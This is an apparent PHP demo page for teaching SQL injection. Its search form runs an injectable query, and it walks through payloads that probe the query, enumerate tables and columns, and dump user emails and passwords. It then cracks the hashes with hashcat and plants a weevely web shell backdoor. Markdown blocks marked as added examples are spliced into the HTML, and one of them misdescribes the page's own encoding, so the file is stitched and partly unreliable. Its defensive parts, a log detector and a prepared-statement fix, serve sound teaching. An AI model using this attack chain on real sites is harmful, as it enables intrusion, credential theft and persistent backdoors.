index.php
154 lines (133 loc) · 7.43 KB
<!DOCTYPE html>
<html>
<head>
<meta charset='utf-8'>
<meta http-equiv='X-UA-Compatible' content='IE=edge'>
<title>Most secure website</title>
<meta name='viewport' content='width=device-width, initial-scale=1'>
<link rel="stylesheet" href="css/style.css" crossorigin="anonymous" />
<link rel="shortcut icon" type="image/ico" href="img/favicon.ico" />
<link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-+0n0xVW2eSR5OomGNYDnhzAbDsOXxcvSN1TPprVMTNDbiYZCxYbOOl7+AMvyTG2x" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<!-- our api script -->
<script type='text/javascript' src="js/api.js"></script>
</head>
<body>
<div class="m-3">
<h4 class="text-center m-3 text-primary">Welcome to web exploit</h4>
<div class="center card mt-3 p-0">
<!-- PHP_SELF reflects the request path, so it is HTML-encoded before being echoed into the attribute -->
<form method="post" action="<?php echo htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES, 'UTF-8'); ?>">
<div class="input-group">
<input autocomplete="off" id="query" type="text" class="form-control" placeholder="search a term" name="query">
<button class="btn btn-outline-secondary" type="submit" id="button-addon2">
<i class="fa fa-search"></i>
</button>
</div>
</form>
<p class="m-3 text-muted"><small>original query </small> <br> SELECT * FROM article WHERE article LIKE '% ? %'</p>
<p class="m-3 text-danger"><small>server output </small> <br>
<?php
include_once('scripts/api.php');
if ($_SERVER["REQUEST_METHOD"] == "POST") {
$query = $_POST['query'];
get_articles($query);
}
?>
</p>
</div>
<div class="row mt-3">
<div class="col card m-2 p-3">
<h5>Initial test for query structure</h5>
<p class="text-success"><small class="text-primary">input </small> <br> %'AND 1 = 1 AND '%' = '</p>
<p><small class="text-primary">expl</small> <br>
This checks whether the query structure is intact: the injected condition resolves
to true, so the query should still run and return results as the developer expected </p>
</div>
<div class="col card m-2 p-3">
<h5>Another test for query structure</h5>
<p class="text-success"><small class="text-primary">input </small> <br>%'AND 1 = 2 AND '%' = '</p>
<p><small class="text-primary">expl</small> <br>
This resolves to a false condition and should return no data at all </p>
</div>
<div class="col card m-2 p-3">
<h5>Get the sql version for current db</h5>
<p class="text-success"><small class="text-primary">input</small> <br>is %' UNION SELECT VERSION() UNION SELECT '%' = ' </p>
<p><small class="text-primary">expl</small> <br>
This appends a second SELECT to the original query with UNION, so the
MySQL version string comes back in the result set </p>
</div>
</div>
<div class="row mt-3">
<div class="col card m-2 p-3">
<h5>Extract table names from information schema</h5>
<p class="text-success"><small class="text-primary">input</small> <br>
is %' UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() UNION SELECT '%' = ' </p>
<p><small class="text-primary">expl</small> <br>
This appends a second SELECT with UNION that returns the names of all
tables in the current database, concatenated into a single value </p>
</div>
<div class="col card m-2 p-3">
<h5>Extract table columns from target table</h5>
<p class="text-success"><small class="text-primary">input</small> <br> is %' UNION
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=DATABASE() AND TABLE_NAME='user'
UNION SELECT '%' = ' </p>
<p><small class="text-primary">expl</small> <br>
This will return the column names for the 'user' table </p>
</div>
<div class="col card m-2 p-3">
<h5>Select data from the target table</h5>
<p class="text-success"><small class="text-primary">input</small> <br>
is %' UNION SELECT group_concat(email, password) FROM user UNION SELECT '%' = ' </p>
<p><small class="text-primary">expl</small> <br>
This will return the email and password values from the 'user' table, concatenated per row </p>
</div>
</div>
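The probes in the two rows above (boolean tests, UNION SELECT, INFORMATION_SCHEMA enumeration, VERSION(), GROUP_CONCAT) all leave recognisable markers in whatever the application logs for its search terms. The following is an added example, not part of this repository: it reads constructed application log lines (format assumed: `<timestamp> <ip> query=<url-encoded term>`; the repository logs nothing on this page) and flags the terms that match those markers, so an operator can see attempted injection before looking at database errors.

```php
<?php
// Added example; not part of the repository. It reads constructed application
// log lines (assumed format: "<timestamp> <ip> query=<url-encoded term>") and
// flags search terms carrying the injection markers shown on the page.

declare(strict_types=1);

// Each rule names one marker from the page's test inputs.
const SQLI_RULES = [
    'quote_boolean_probe' => "/'\\s*(AND|OR)\\s+\\d+\\s*=\\s*\\d+/i",
    'union_select'        => '/\\bUNION\\s+(ALL\\s+)?SELECT\\b/i',
    'schema_enumeration'  => '/\\bINFORMATION_SCHEMA\\.(TABLES|COLUMNS)\\b/i',
    'db_fingerprint'      => '/\\b(VERSION|DATABASE)\\s*\\(\\s*\\)/i',
    'row_concatenation'   => '/\\bGROUP_CONCAT\\s*\\(/i',
];

// Returns the names of every rule the decoded search term matches.
function classify_search_term(string $term): array
{
    $hits = [];
    foreach (SQLI_RULES as $name => $regex) {
        if (preg_match($regex, $term) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Parses the assumed log format, URL-decodes the term and keeps only flagged entries.
function scan_log(array $lines): array
{
    $findings = [];
    foreach ($lines as $line) {
        if (preg_match('/^(\\S+) (\\S+) query=(.*)$/', $line, $m) !== 1) {
            continue; // not a search-term line
        }
        $term = urldecode($m[3]);
        $hits = classify_search_term($term);
        if ($hits !== []) {
            $findings[] = ['time' => $m[1], 'ip' => $m[2], 'term' => $term, 'rules' => $hits];
        }
    }
    return $findings;
}

// Constructed sample log: the page's own test inputs mixed with benign searches.
$sample_log = [
    '2024-01-01T10:00:00Z 203.0.113.5 query=php+tutorial',
    '2024-01-01T10:00:05Z 203.0.113.5 query=%25%27AND+1+%3D+1+AND+%27%25%27+%3D+%27',
    '2024-01-01T10:00:09Z 203.0.113.5 query=is+%25%27+UNION+SELECT+VERSION%28%29+UNION+SELECT+%27%25%27+%3D+%27',
    '2024-01-01T10:01:00Z 198.51.100.7 query=rock+and+roll',
];

foreach (scan_log($sample_log) as $f) {
    printf("%s %-14s %-32s %s\n", $f['time'], $f['ip'], implode(',', $f['rules']), $f['term']);
}
```

Run against the constructed log, the two injection probes from 203.0.113.5 are reported (the first as `quote_boolean_probe`, the second as `union_select,db_fingerprint`) while the benign searches are not. The rules key on SQL syntax rather than on specific payload strings, so spacing and case variants of the same probes are still caught; a production version would add rate limiting per source address so one client sending many such terms stands out.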
<div class="row mt-3">
<div class="col card m-2 p-3">
<h5>Find the password from the hash</h5>
<div class="text-success"><small class="text-primary">input</small> <br>
<pre>$ hashcat -m 0 -a 0 hash.txt "passwords_list"</pre>
</div>
<p><small class="text-primary">expl</small> <br>
Since MySQL may store MD5 hashes we use (-m 0), or (-m 400) for the phpass hash type used by PHP applications.<br>
The attack mode (-a 0) is straight (wordlist); there are other modes too. <br>
(hash.txt) holds our password hash, (passwords_list) is the sample wordlist to try. </p>
</div>
<div class="col card m-2 p-3">
<h5>Login to admin panel of website (mostly for wordpress)</h5>
<p class="text-success"><small class="text-primary">input</small> <br>
create a new php file or update an existing one </p>
<div><small class="text-primary">expl</small> <br>
Copy in the contents of ssh.php, which was created as below using the
<a href="https://github.com/epinna/weevely3">weevely tool</a> <br>
<pre>$ weevely generate 'password' ./ssh.php</pre>
which places the php file on the server through the admin panel.
</div>
</div>
<div class="col card m-2 p-3">
<h5>Final step connect to the target host</h5>
<p class="text-success"><small class="text-primary">input</small> <br>
use the backdoor which we just planted </p>
<div><small class="text-primary">expl</small> <br>
Type the following in your command line <br>
<pre>$ weevely 'url' 'password'</pre>
here (url) is the URL of the website and (password) is the password used to
generate the file.
</div>
</div>
</div>
<div class="row mt-3">
<div class="col card m-2 p-3">
<h5>How to avoid sql-injection attacks like this</h5>
<p class="text-success"><small class="text-primary">input</small> <br>
just use <a href="https://www.php.net/manual/en/mysqli.quickstart.prepared-statements.php">
prepared statements</a> </p>
<p><small class="text-primary">expl</small> <br>
Prepared statements send the SQL text and the user-supplied values to the server separately,
so input is treated as data and is never parsed as part of the statement; also use a strong
database password and disallow multiple queries per request.
</p>
</div>
</div>
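The page links to the mysqli prepared-statement documentation but never shows `get_articles()` itself (scripts/api.php is not on this page). The block below is an added example, not the repository's code: it reconstructs a `get_articles_vulnerable()` that builds exactly the query the page displays (`SELECT * FROM article WHERE article LIKE '% ? %'`) by string concatenation, and places the hardened `get_articles_safe()` beside it. The connection details are placeholders, and the function and table names are assumptions.

```php
<?php
// Added example, not the repository's scripts/api.php (not shown on the page).
// Reconstructs the page's query as vulnerable string concatenation, then the
// same query as a mysqli prepared statement. Credentials are placeholders.

declare(strict_types=1);

function connect(): mysqli
{
    // Throw on every MySQL error instead of silently returning false.
    mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
    // Placeholder credentials; replace with your own configuration.
    return new mysqli('localhost', 'app_user', 'APP_PASSWORD_PLACEHOLDER', 'app_db');
}

// Vulnerable: the raw search term is spliced into the SQL text, so a term
// containing a single quote closes the string literal and whatever follows
// (AND 1 = 1, UNION SELECT ...) is parsed as SQL. Kept here only for contrast.
function get_articles_vulnerable(mysqli $db, string $term): array
{
    $sql = "SELECT * FROM article WHERE article LIKE '%" . $term . "%'";
    return $db->query($sql)->fetch_all(MYSQLI_ASSOC);
}

// Hardened: the statement text is fixed and compiled first; the term travels
// separately as a bound parameter, so it cannot change the query's structure.
// Escaping % and _ (MySQL's default LIKE escape is backslash) also stops the
// user from widening the pattern to match every row.
function get_articles_safe(mysqli $db, string $term): array
{
    $pattern = '%' . addcslashes($term, '%_\\') . '%';
    $stmt = $db->prepare('SELECT * FROM article WHERE article LIKE ?');
    $stmt->bind_param('s', $pattern);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// Output encoding is the second half of the fix: the page echoes query results
// and $_SERVER['PHP_SELF'] straight into HTML, which is a separate injection path.
function render_results(array $rows): string
{
    $items = '';
    foreach ($rows as $row) {
        $items .= '<li>' . htmlspecialchars((string) $row['article'], ENT_QUOTES, 'UTF-8') . '</li>';
    }
    return '<ul>' . $items . '</ul>';
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $term = (string) ($_POST['query'] ?? '');
    echo render_results(get_articles_safe(connect(), $term));
}
```

One caveat on the "disallow multiple queries" advice: `mysqli::query()` already refuses stacked statements (only `multi_query()` runs them), yet every probe on this page still works, because UNION extends a single statement rather than adding a second one. Restricting multi-statement execution is worth doing, but the prepared statement is what actually closes the hole; the fixed SQL text above cannot grow a UNION no matter what the term contains.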
</div>
</body>
</html>